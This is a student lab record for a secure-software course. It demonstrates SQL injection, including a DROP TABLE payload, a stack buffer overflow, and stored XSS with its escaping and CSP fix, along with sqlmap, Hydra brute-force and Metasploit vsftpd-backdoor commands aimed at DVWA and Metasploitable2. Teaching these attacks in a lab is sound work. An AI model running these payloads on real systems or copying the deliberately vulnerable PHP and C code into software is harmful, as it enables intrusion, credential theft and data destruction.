DEPARTMENT: B. E.

CSE(CYBER SECURITY)

LABORATORY: ENGINEERING SECURE SOFTWARE SYSTEM

Name : Roll No:

Semester: V Course: B. E Branch: CSE(CYBER SECURITY)

Subject Code & Title: CB3591 ENGINEERING SECURE SOFTWARE SYSTEM - LABORATORY

University Register No:

Certified that this is a bonafide record of work done by the above student in the laboratory
during the year 2024 - 2025.

Signature of the staff in-charge Head of the Department

INTERNAL EXAMINER EXTERNAL EXAMINER

 CONTENTS
Date Page
S.no Name of the experiment Mark Signature
no
 Experiment 1
Implementing SQL Injection Attack
Aim:
To understand and demonstrate SQL injection attacks, their impact on databases, and how
attackers exploit vulnerabilities in web applications.

Theory
SQL injection is a code injection technique used to exploit vulnerabilities in an application's
software by manipulating SQL queries. It occurs when an application allows user inputs to
modify database queries without proper validation or sanitization.

Requirements
1. Software:
o XAMPP (or any LAMP/WAMP server) for hosting the application and database.
o Browser (e.g., Chrome, Firefox).
o SQL Database (e.g., MySQL).
2. Programming Language:
o PHP (or any server-side language).
3. Tools:
o Text editor (e.g., VSCode, Sublime Text).
o Sample database (e.g., test_db).
Procedure
Step 1: Setting up the Environment
1. Install and configure XAMPP.
2. Create a database test_db using phpMyAdmin.
3. Add a table users with the following structure:

CREATE TABLE users (

id INT AUTO_INCREMENT PRIMARY KEY,
username VARCHAR(50) NOT NULL,
password VARCHAR(50) NOT NULL
);
4. Insert sample data into the users table:

3
INSERT INTO users (username, password) VALUES ('admin', 'admin123'), ('user', 'user123');
Step 2: Writing the Vulnerable Application
1. Create a PHP file login.php with the following code:
php
Copy code
<?php
$conn = new mysqli('localhost', 'root', '', 'test_db');

if ($_SERVER["REQUEST_METHOD"] == "POST") {
$username = $_POST['username'];
$password = $_POST['password'];

// Vulnerable SQL Query

$sql = "SELECT * FROM users WHERE username='$username' AND
password='$password'";
$result = $conn->query($sql);

if ($result->num_rows > 0) {
echo "Login Successful!";
} else {
echo "Invalid Credentials!";
}
}
?>
<form method="POST" action="">
Username: <input type="text" name="username"><br>
Password: <input type="password" name="password"><br>
<button type="submit">Login</button>
</form>
Step 3: Performing the SQL Injection Attack
1. Access login.php in the browser (e.g., http://localhost/login.php).
2. Input the following credentials to bypass login:
o Username: admin' --
o Password: (leave blank)

4
 3. Observe the response: "Login Successful!"
This happens because the SQL query becomes:

SELECT * FROM users WHERE username='admin' --' AND password='';

The -- comments out the rest of the query, bypassing password verification.
Step 4: Testing Data Manipulation
1. Input the following payload in the username field to delete the users table:
o Username: '; DROP TABLE users; --
2. Observe that the table is deleted, demonstrating the destructive power of SQL injection.

Result
The SQL injection attack was successfully implemented, showcasing how attackers exploit
vulnerabilities in applications to manipulate or access sensitive data. Mitigation techniques were
identified and demonstrated.

5
 Experiment 2
Implementing Buffer Overflow Attack

Aim:
To understand and demonstrate how buffer overflow attacks work, their effects on system
memory, and how attackers exploit these vulnerabilities to gain unauthorized access or crash a
program.

Theory
Buffer Overflow
A buffer overflow occurs when a program writes more data to a buffer (a contiguous memory
block) than it can hold. This excess data can overwrite adjacent memory, potentially altering the
program’s behavior or causing it to execute malicious code.

Requirements
1. Operating System: Linux (preferred for tools like gcc and gdb).
2. Software:
o GCC (GNU Compiler Collection).
o GDB (GNU Debugger).
3. Programming Language: C.

Procedure
Step 1: Setting up the Environment
1. Install GCC and GDB:
sudo apt update
sudo apt install gcc gdb
2. Create a directory for the experiment files:
bash
Copy code
mkdir buffer_overflow_lab
cd buffer_overflow_lab

Step 2: Writing a Vulnerable Program

1. Create a C file named vulnerable.c:

6
#include <stdio.h>
#include <string.h>

void vulnerable_function(char *input) {

char buffer[16]; // Buffer of 16 bytes
strcpy(buffer, input); // Unsafe function
printf("You entered: %s\n", buffer);
}

int main(int argc, char *argv[]) {

if (argc < 2) {
printf("Usage: %s <input>\n", argv[0]);
return 1;
}
vulnerable_function(argv[1]);
return 0;
}
2. Compile the program without stack protection:
gcc -fno-stack-protector -o vulnerable vulnerable.c

Step 3: Triggering the Buffer Overflow

1. Run the program with a normal input:
bash
Copy code
./vulnerable "Hello, World!"
Output:
yaml
Copy code
You entered: Hello, World!
2. Run the program with an oversized input:
bash
Copy code
./vulnerable "AAAAAAAAAAAAAAAAAAAAAAAAAAAA"
Observe a segmentation fault indicating a buffer overflow.

7
Step 4: Exploiting the Buffer Overflow
1. Create a Malicious Payload: Use a script or manual calculation to craft a payload that
overwrites the return address. For example:
./vulnerable $(python3 -c 'print("A"*24 + "\xef\xbe\xad\xde")')
Replace \xef\xbe\xad\xde with the address of the malicious code (obtained using gdb).
2. Analyze Using GDB:
o Start debugging:
gdb ./vulnerable
o Run the program with oversized input:
run AAAAAAAAAAAAAAAAAAAAAAAAAAAA
o Observe the overwritten return address.

Result
The buffer overflow attack was successfully implemented, demonstrating how improper memory
management can compromise application security. Mitigation techniques were identified and
discussed.

8
 Experiment 3
Implementing Cross-Site Scripting (XSS) and Preventing XSS

Aim:
To understand Cross-Site Scripting (XSS) attacks, how they exploit vulnerabilities in web
applications to inject malicious scripts, and the measures to prevent such attacks.

Theory
Cross-Site Scripting (XSS):
XSS is a type of attack in which malicious scripts are injected into trusted websites. It occurs
when an application accepts untrusted user inputs and returns them to the browser without
proper validation or escaping.
Types of XSS:
1. Stored XSS: Malicious scripts are permanently stored on the target server, such as in
databases or message boards.
2. Reflected XSS: Malicious scripts are reflected off a web application, such as in error
messages or search results.
3. DOM-Based XSS: Malicious scripts manipulate the Document Object Model (DOM)
directly in the browser.
Impacts of XSS:
• Theft of cookies or session data.
• Defacement of web pages.
• Execution of malicious actions on behalf of a victim.

Requirements
1. Software:
o XAMPP (or any LAMP/WAMP server).
o Browser with developer tools (e.g., Chrome, Firefox).
2. Programming Language:
o HTML, JavaScript, and PHP.

Procedure
Step 1: Setting up the Environment
1. Install and configure XAMPP.

9
 2. Create a project directory for the lab (e.g., xss_lab).
3. Create a database xss_demo using phpMyAdmin, and add a table comments:
CREATE TABLE comments (
id INT AUTO_INCREMENT PRIMARY KEY,
username VARCHAR(50) NOT NULL,
comment TEXT NOT NULL
);

Step 2: Writing a Vulnerable Application

1. Create a file xss.php with the following code:
<?php
$conn = new mysqli('localhost', 'root', '', 'xss_demo');

if ($_SERVER['REQUEST_METHOD'] == 'POST') {
$username = $_POST['username'];
$comment = $_POST['comment'];

// Vulnerable Code: Directly inserting user input into the database

$conn->query("INSERT INTO comments (username, comment) VALUES ('$username',
'$comment')");
}

$result = $conn->query("SELECT * FROM comments");

?>
<!DOCTYPE html>
<html>
<head>
<title>XSS Demonstration</title>
</head>
<body>
<h1>Comment Section</h1>
<form method="POST" action="">
<input type="text" name="username" placeholder="Enter your name" required><br>
<textarea name="comment" placeholder="Enter your comment" required></textarea><br>

10
 <button type="submit">Submit</button>
</form>
<h2>Comments:</h2>
<?php while ($row = $result->fetch_assoc()): ?>
<p><strong><?php echo $row['username']; ?>:</strong> <?php echo $row['comment'];
?></p>
<?php endwhile; ?>
</body>
</html>
2. Start the server and access the application (e.g., http://localhost/xss_lab/xss.php).

Step 3: Performing an XSS Attack

1. Submit a normal comment:
o Username: John
o Comment: Hello, everyone!
o Output: The comment is displayed as entered.
2. Submit a malicious script:
o Username: Attacker
o Comment: <script>alert('XSS Attack!');</script>
o Output: An alert box pops up in the browser whenever the page is loaded.
3. Observe that the malicious script is stored in the database and executed whenever the
page is reloaded.

Step 4: Preventing XSS

1. Modify the PHP code to escape output before rendering it in xss.php:
<?php echo htmlspecialchars($row['username']); ?>:
<?php echo htmlspecialchars($row['comment']); ?>
2. Test the application again:
o Submit the same malicious script.
o Observe that the script is displayed as plain text instead of being executed.
3. Implement additional preventive measures:
o Validate and sanitize inputs using PHP filters:

$username = filter_var($_POST['username'], FILTER_SANITIZE_STRING);

11
$comment = filter_var($_POST['comment'], FILTER_SANITIZE_STRING);
o Use Content Security Policy (CSP) headers to restrict script execution:
header("Content-Security-Policy: script-src 'self';");

Result
The Cross-Site Scripting attack was successfully demonstrated, showing how vulnerabilities can
be exploited to execute malicious scripts. Techniques to prevent XSS were implemented and
verified.

12
 Experiment 4
Performing Penetration Testing on a Web Application Using Tools like Kali Linux

Aim:
To perform penetration testing on a web application to gather information about the system and
demonstrate Cross-Site Scripting (XSS) and SQL Injection attacks using tools like Kali Linux.

Theory
Penetration Testing:
Penetration testing, or ethical hacking, involves simulating cyberattacks on a system to identify
and address security vulnerabilities.
Phases of Penetration Testing:
1. Reconnaissance: Gathering information about the target system.
2. Scanning: Identifying open ports, services, and vulnerabilities.
3. Exploitation: Launching attacks like XSS and SQL Injection to validate vulnerabilities.
4. Reporting: Documenting findings and providing recommendations.
Tools in Kali Linux:
1. Burp Suite: A web application security testing tool.
2. OWASP ZAP: An open-source web application security scanner.
3. SQLMap: A tool for automated SQL injection.
4. Browser Developer Tools: To manually test for vulnerabilities like XSS.

Requirements
1. Software:
o Kali Linux (or a virtual machine running Kali Linux).
o Vulnerable web application (e.g., DVWA - Damn Vulnerable Web Application).
o Web browser (e.g., Firefox, Chrome).
2. Tools in Kali Linux:
o Burp Suite.
o SQLMap.
o OWASP ZAP

13
Procedure
Step 1: Setting Up the Environment
1. Install and configure Kali Linux on a physical or virtual machine.
2. Set up a vulnerable web application like DVWA:
o Install XAMPP and DVWA on a separate system or VM.
o Access DVWA in a browser (e.g., http://<ip-address>/dvwa).
o Set the DVWA security level to low.

Step 2: Reconnaissance and Information Gathering

1. Open Kali Linux and launch OWASP ZAP:
o Set the browser proxy to OWASP ZAP.
o Intercept traffic and analyze HTTP requests and responses.
2. Use Nmap to scan the target for open ports and services:
nmap -sS -p- <target-ip>
3. Identify application structure and input fields using Burp Suite:
o Configure the browser to route traffic through Burp Suite.
o Enable the Burp Suite proxy and browse the target application.
o Analyze intercepted requests to identify parameters vulnerable to attacks.

Step 3: Initiating SQL Injection

1. Identify vulnerable input fields:
o Use Burp Suite or OWASP ZAP to detect fields sending SQL queries.
2. Launch an SQL Injection attack using SQLMap:
o Command to test SQL Injection:
sqlmap -u "http://<target-ip>/dvwa/vulnerable.php?id=1" --dbs
o Extract database tables:
sqlmap -u "http://<target-ip>/dvwa/vulnerable.php?id=1" -D <database-name> --tables
3. Verify the attack:
o Extract sensitive data such as user credentials from the database.

Step 4: Initiating XSS Attack

1. Identify vulnerable input fields:
o Use OWASP ZAP or browser developer tools to locate input fields returning user

14
 input in the response.
2. Inject an XSS payload:
o Payload example:
<script>alert('XSS Detected!');</script>
o Submit the payload in vulnerable input fields like comment boxes or search bars.
3. Verify the attack:
o Observe script execution in the browser.

Step 5: Reporting Findings

1. Document identified vulnerabilities, including screenshots of successful attacks.
2. Include details about the impact of the attacks and suggested mitigation techniques.

Result
Penetration testing was performed successfully, demonstrating information gathering, SQL
Injection, and XSS attacks. Effective mitigation techniques were discussed and documented.

15
 Experiment 5
Develop and Test Secure Test Cases

Aim:
To understand the process of creating and executing secure test cases to identify and mitigate
potential vulnerabilities in software applications.

Theory
Secure Test Cases:
Secure test cases are designed to evaluate the security aspects of a software application. They
aim to identify vulnerabilities, weaknesses, or misconfigurations that could be exploited by
attackers.
Key Principles of Secure Testing:
1. Confidentiality: Ensures sensitive data is not exposed.
2. Integrity: Verifies that data is not altered without authorization.
3. Availability: Ensures the application remains operational under various conditions.
4. Authentication and Authorization: Confirms that only authorized users can access
protected resources.
5. Input Validation: Prevents invalid or malicious inputs.

Requirements
1. Software:
o Application under test (e.g., a web application or API).
o Testing tools (e.g., Postman, OWASP ZAP, Burp Suite, Selenium).
2. Programming Language/Frameworks:
o Use of testing frameworks such as JUnit, Pytest, or custom scripts.
Procedure
Step 1: Define Security Requirements
1. Identify security requirements of the application. For example:
o User authentication must use a secure protocol (e.g., HTTPS).
o Passwords must be hashed and not stored in plaintext.
o Application must validate all inputs.

16
Step 2: Create Secure Test Cases
Design test cases based on identified security requirements. Examples include:
o Authentication Test Case: Test login functionality with valid and invalid
credentials.
o SQL Injection Test Case: Test inputs for susceptibility to SQL Injection.
o XSS Test Case: Test for unescaped user inputs that could execute malicious
scripts.
o Session Management Test Case: Test session expiry after inactivity.

Step 3: Execute Test Cases

1. Manual Testing:
o Use Postman or browser developer tools to test APIs or input fields.
o Verify responses for vulnerabilities.
2. Automated Testing:
o Write automated scripts to test repetitive scenarios. Example (using Selenium for
XSS):

from selenium import webdriver

from selenium.webdriver.common.keys import Keys

driver = webdriver.Chrome()
driver.get("http://example.com/login")
username = driver.find_element("name", "username")
username.send_keys("<script>alert('XSS')</script>")
driver.find_element("name", "submit").click()

# Verify alert is not triggered

assert "alert" not in driver.page_source
driver.quit()
3. Use tools like OWASP ZAP or Burp Suite to scan for security vulnerabilities
automatically.

17
Step 4: Recommend Mitigation Measures
1. Fix Identified Issues: Collaborate with developers to resolve vulnerabilities.
2. Re-test Resolved Issues: Run secure test cases again to verify fixes.
3. Implement Preventive Measures:
o Use secure coding practices.
o Regularly update and patch the application.

Result
Secure test cases were successfully developed and executed. Vulnerabilities were identified,
and mitigation strategies were suggested to enhance the application's security.

18
 Experiment 6
Penetration Testing Using Kali Linux

Aim:
To conduct a penetration test on a target system using Kali Linux, identifying vulnerabilities and
assessing the security of the system.

Theory
Penetration Testing:
Penetration testing simulates real-world attacks on a system to uncover vulnerabilities and
provide actionable insights to secure the system.
Phases of Penetration Testing:
1. Reconnaissance: Information gathering about the target system.
2. Scanning and Enumeration: Identifying open ports, services, and vulnerabilities.
3. Exploitation: Attempting to exploit vulnerabilities to gain unauthorized access.
4. Post-Exploitation: Assessing the impact of exploitation and maintaining access.
5. Reporting: Documenting findings and providing recommendations.
Kali Linux Tools for Penetration Testing:
1. Nmap: Network scanning and port discovery.
2. Metasploit Framework: Exploitation and payload delivery.
3. Nikto: Web server scanning.
4. OWASP ZAP: Web application security testing.
5. Hydra: Brute force attacks on authentication services.

Requirements
1. Software:
o Kali Linux (physical or virtual machine).
o Vulnerable system (e.g., Metasploitable2 or DVWA).
2. Network:
o Both systems (Kali Linux and target) connected to the same network.

19
Procedure
Step 1: Setting Up the Environment
1. Install and configure Kali Linux on a physical or virtual machine.
2. Set up a vulnerable system such as Metasploitable2:
o Download and run the Metasploitable2 virtual machine.
o Ensure it is reachable from Kali Linux (ping the IP address).

Step 2: Reconnaissance (Information Gathering)

1. Use Nmap to scan the target system for open ports and services:
nmap -sS -p- -A <target-ip>
o -sS: Performs a stealth SYN scan.
o -p-: Scans all ports (1-65535).
o -A: Enables OS detection and version detection.
2. Analyze the scan output to identify running services and possible entry points.

Step 3: Scanning and Enumeration

1. Use Nikto to scan the web server for known vulnerabilities:
nikto -h http://<target-ip>
o Review the vulnerabilities reported (e.g., outdated software, misconfigurations).
2. Enumerate services using Nmap scripts:
nmap --script vuln <target-ip>
3. Use Hydra to perform a brute force attack on a login service:
hydra -l admin -P /usr/share/wordlists/rockyou.txt <target-ip> ssh
o -l: Specifies the username.
o -P: Specifies the wordlist for passwords.

Step 4: Exploitation
1. Open Metasploit Framework in Kali Linux:
msfconsole
2. Search for available exploits for identified vulnerabilities:
search vsftpd
3. Use the exploit and set the target options:
use exploit/unix/ftp/vsftpd_234_backdoor
set RHOSTS <target-ip>

20
set RPORT 21
exploit
4. Verify if unauthorized access or shell access is obtained.

Step 5: Post-Exploitation
1. Assess the level of access obtained:
o Retrieve sensitive files (e.g., /etc/passwd).
o Check for escalated privileges.
2. Document the potential impact of the exploit.

Step 6: Reporting
1. Create a detailed report with the following details:
o Scanned open ports and services.
o Vulnerabilities identified and exploited.
o Screenshots of successful exploitation.
o Recommendations for securing the system.

Result
The penetration test was conducted successfully, identifying vulnerabilities and demonstrating
the ability to exploit them using Kali Linux tools.

21